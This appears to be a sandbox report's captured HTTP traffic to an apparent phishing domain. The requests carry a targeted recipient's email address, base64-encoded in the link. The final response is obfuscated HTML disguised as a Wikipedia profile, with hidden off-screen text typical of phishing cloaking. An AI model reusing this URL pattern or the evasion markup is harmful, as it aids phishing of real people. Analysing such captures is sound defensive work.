                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e2397ea0bb079-IAH
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128463&min_rtt=128252&rtt_var=27248&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1076&delivery_rate=31471&cwnd=253&unsent_bytes=0&cid=a837ce34a657d1e5&ts=394&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC71INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body>
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC102INData Raw: 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: <center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      2192.168.11.1249373104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:01 UTC498OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      2025-03-21 14:29:01 UTC1092INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:01 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:01 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXpZvlKhxLH1C%2BB4sm55z%2FHu%2B%2FNGVW3rvRAt5FDSP5UJOLx2RiGvQdc7bNPRFZcLFcXVk12Hy92NyTxdflGYYNOWjZSzxkMj%2BNSDsfIlztnKcucwUX45iWOFbYekvf%2BN%2Fz6P0mkYjVMiTyQEAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=74&min_rtt=74&rtt_var=37&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=669&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      CF-RAY: 923e239c1bca9acb-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:01 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      3192.168.11.1249375104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:01 UTC498OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC1298INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:02 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:02 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKnMA6JcFFRwSBXLYfXehlblpqhhcFBDxqxpmxnODCtHs997FIomJqEgEB6OKwSmLWiMdwHWnxwGN3z1WDnXxvXd6IBckEJZ%2Fj6iGoKVU7LR3iasBAKE446UByorx4sp0cu8jgvKrodER6uSEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=74&min_rtt=74&rtt_var=37&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=693&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23a00a647451-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129307&min_rtt=129201&rtt_var=27417&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1076&delivery_rate=31170&cwnd=252&unsent_bytes=0&cid=33c4dbb33e6da63f&ts=346&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC71INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body>
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC102INData Raw: 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: <center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      4192.168.11.1249377104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC498OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC1310INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:02 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:02 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ulxrIb3kwc%2BKgE4rDcRwLC57748i4gKlVp6afif0kG6%2BeH4gPbBR%2BFYpm2xr4xOig9JTkhXBC%2FXl1YBcHgMHwaDW5luc56ardPa0%2Fmm8lfvgiCBzf1azX4Z1My14PtEQ3%2BiYE%2FMR2vdYE2vx8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=57&min_rtt=57&rtt_var=28&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=693&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23a40c102577-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134240&min_rtt=134175&rtt_var=28406&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1076&delivery_rate=30041&cwnd=252&unsent_bytes=0&cid=06c1e417ed1026bb&ts=409&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC59INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></hea
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC114INData Raw: 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: d><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      5192.168.11.1249379104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:03 UTC498OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      2025-03-21 14:29:03 UTC1304INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:03 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:03 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FPBi3xxz7yJMv1qpD4O5k7SmX5cuqK7GN6Qlw5ppFp5TjGqnawmVXDxsBCKm9bfoYgi3x2EI7huvbw%2F4Qs1zwXMdHoOa5ZvHJZftTkhnsQYOL26hhN9rzIWL82fl%2F1QRd%2B55heGZxkrGiLOPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=77&min_rtt=77&rtt_var=38&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=693&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23a84e588e06-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129427&min_rtt=129358&rtt_var=27400&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1076&delivery_rate=31146&cwnd=252&unsent_bytes=0&cid=fb79aa96a3fe5663&ts=348&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:03 UTC65INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><b
                                                                                                                                                                                                                      2025-03-21 14:29:03 UTC108INData Raw: 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: ody><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      6192.168.11.1249382104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:03 UTC498OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:04 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Vary: Cookie
                                                                                                                                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Set-Cookie: session_ffx=SlnvILp4p6TK1sf5rz5yYr8nDfErqV-VbSqom6pa2qE; HttpOnly; Path=/; Domain=215.241.147
                                                                                                                                                                                                                      CF-RAY: 923e23ac1f93db0d-MIA
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC999INData Raw: 31 38 34 61 0d 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 66 69 6c 74 65 72 3a 20 68 75 65 2d 72 6f 74 61 74 65 28 33 36 2e 30 32 36 36 38 31 64 65 67 29 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4d 65 64 69 61 57 69 6b 69 20 31 2e 34 34 2e 30 2d 77 6d 66 2e 32 31 22 20 6e 61 6d 65 3d 67 65 6e 65 72 61 74 6f 72 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 20 6e 61 6d 65 3d 52 65 73 6f 75 72 63 65 4c 6f 61 64 65 72 44 79 6e 61 6d 69 63 53 74 79 6c 65 73 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 77 65 62 73 69 74 65 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 79 70 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 23 65 66 37 66 61 37 32 30 66 33 20 72 65 6c 3d 64 6e 73 2d 70 72 65 66 65 74 63 68 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                      Data Ascii: 184a<html style="filter: hue-rotate(36.026681deg)"><head><meta content="MediaWiki 1.44.0-wmf.21" name=generator><meta content name=ResourceLoaderDynamicStyles><meta content=website property=og:type><link href=#ef7fa720f3 rel=dns-prefetch><meta content="
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1369INData Raw: 3d 45 64 69 74 55 52 49 20 74 79 70 65 3d 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6d 77 3a 50 61 67 65 50 72 6f 70 2f 74 6f 63 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 23 66 32 39 33 33 20 72 65 6c 3d 63 61 6e 6f 6e 69 63 61 6c 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 6e 61 20 4a c3 b3 65 6c 73 64 c3 b3 74 74 69 72 20 2d 20 57 69 6b 69 70 65 64 69 61 22 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 32 30 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 74 69 74 6c 65 3e 50 72 6f 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69
                                                                                                                                                                                                                      Data Ascii: =EditURI type=application/rsd+xml><meta property=mw:PageProp/toc><link href=#f2933 rel=canonical><meta content="Anna Jelsdttir - Wikipedia" property=og:title><meta content="width=1120" name=viewport><title>Profile</title><meta content="width=device-wi
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1369INData Raw: 6c 65 66 74 3a 20 2d 31 32 37 38 33 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 20 2d 37 30 3b 22 3e 54 6f 67 67 6c 65 20 74 68 65 20 74 61 62 6c 65 20 6f 66 20 63 6f 6e 74 65 6e 74 73 3c 2f 73 70 61 6e 3e 3c 68 32 20 69 64 3d 57 6f 72 6b 5f 61 6e 64 5f 41 72 74 69 73 74 69 63 5f 50 72 61 63 74 69 63 65 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 7a 2d 69 6e 64 65 78 3a 20 2d 33 36 3b 22 3e 57 6f 72 6b 20 61 6e 64 20 41 72 74 69 73 74 69 63 20 50 72 61 63 74 69 63 65 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 72 65 66 65 72 65 6e 63 65 2d 74 65 78 74 20 73 74 79 6c 65
                                                                                                                                                                                                                      Data Ascii: left: -12783px; z-index: -70;">Toggle the table of contents</span><h2 id=Work_and_Artistic_Practice style="position: absolute; color: transparent; background-color:transparent; z-index: -36;">Work and Artistic Practice</h2><span class=reference-text style
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1369INData Raw: 62 63 64 63 3d 65 38 34 36 61 30 20 64 61 74 61 2d 62 65 61 39 3d 62 63 65 39 63 65 34 20 64 61 74 61 2d 63 65 31 62 34 30 3d 65 65 36 62 62 62 36 20 64 61 74 61 2d 64 64 65 39 33 30 3d 62 32 35 20 64 61 74 61 2d 65 30 66 3d 63 31 39 32 20 69 64 3d 72 6f 75 6e 64 65 72 20 6d 75 74 65 64 3d 61 32 39 37 66 65 63 33 39 64 37 65 35 39 20 6f 70 65 6e 3d 63 38 35 36 66 66 39 35 38 65 20 6f 70 74 69 6d 75 6d 3d 65 36 33 31 30 63 32 33 64 37 32 61 31 35 20 70 69 6e 67 3d 61 63 31 64 64 36 35 37 35 36 20 73 63 6f 70 65 3d 64 34 30 64 39 66 36 37 65 34 34 35 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 32 65 63 66 63 62 64 31 20 62 39 66 66 32 20 66 66 63 62 65 38 64 30 20 62 61 36 63 61 64 63 62 20 62 34 31 36 30 63 34 20 66 35 65 64 65 64 33 37 20 61 62 66 66 64
                                                                                                                                                                                                                      Data Ascii: bcdc=e846a0 data-bea9=bce9ce4 data-ce1b40=ee6bbb6 data-dde930=b25 data-e0f=c192 id=rounder muted=a297fec39d7e59 open=c856ff958e optimum=e6310c23d72a15 ping=ac1dd65756 scope=d40d9f67e4452><div class="c2ecfcbd1 b9ff2 ffcbe8d0 ba6cadcb b4160c4 f5eded37 abffd
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1120INData Raw: 6f 70 65 3d 63 61 36 30 32 38 39 36 63 34 31 32 20 73 70 61 6e 3d 66 35 65 30 35 63 38 37 37 35 63 63 63 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 33 66 38 61 39 20 61 35 37 62 63 63 20 64 63 62 61 31 31 38 31 31 20 62 34 66 38 36 31 36 34 20 65 62 62 36 62 38 36 37 20 63 32 38 37 37 30 32 64 20 62 66 66 39 65 20 62 33 63 30 34 30 22 20 64 61 74 61 2d 61 61 64 65 39 63 34 3d 65 31 64 20 64 61 74 61 2d 62 36 30 31 63 62 3d 65 37 37 31 20 64 61 74 61 2d 62 37 39 64 32 38 65 3d 65 63 38 35 38 61 62 20 64 61 74 61 2d 63 31 30 3d 63 32 37 20 64 61 74 61 2d 65 65 38 65 34 3d 64 64 64 31 64 62 20 69 64 3d 6c 6f 61 64 2d 74 65 78 74 20 6c 6f 77 3d 64 36 32 32 66 36 62 37 39 31 20 6d 65 74 68 6f 64 3d 63 61 66 34 39 36 38 39 33 63 32 32 36 20 6d 75 74 65 64 3d
                                                                                                                                                                                                                      Data Ascii: ope=ca602896c412 span=f5e05c8775ccc><span class="b3f8a9 a57bcc dcba11811 b4f86164 ebb6b867 c287702d bff9e b3c040" data-aade9c4=e1d data-b601cb=e771 data-b79d28e=ec858ab data-c10=c27 data-ee8e4=ddd1db id=load-text low=d622f6b791 method=caf496893c226 muted=
